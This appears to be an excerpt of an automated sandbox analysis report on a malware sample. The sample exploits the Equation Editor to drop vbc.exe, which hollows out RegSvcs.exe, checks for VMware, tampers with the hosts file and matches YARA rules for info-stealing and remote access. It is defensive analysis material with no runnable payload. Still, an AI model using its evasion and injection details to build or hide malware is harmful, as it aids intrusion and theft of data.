Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 30000
Source: EQNEDT32.EXE, 00000002.00000002.962418834.0000000000384000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: EQNEDT32.EXE, 00000002.00000002.962329452.000000000035B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0368067D mov edx, dword ptr fs:[00000030h] 2_2_0368067D
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File written: C:\Windows\System32\drivers\etc\hosts

Stealing of Sensitive Information

Source: Yara match File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR
Source: Yara match File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR
Source: Yara match File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR
Source: Yara match File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR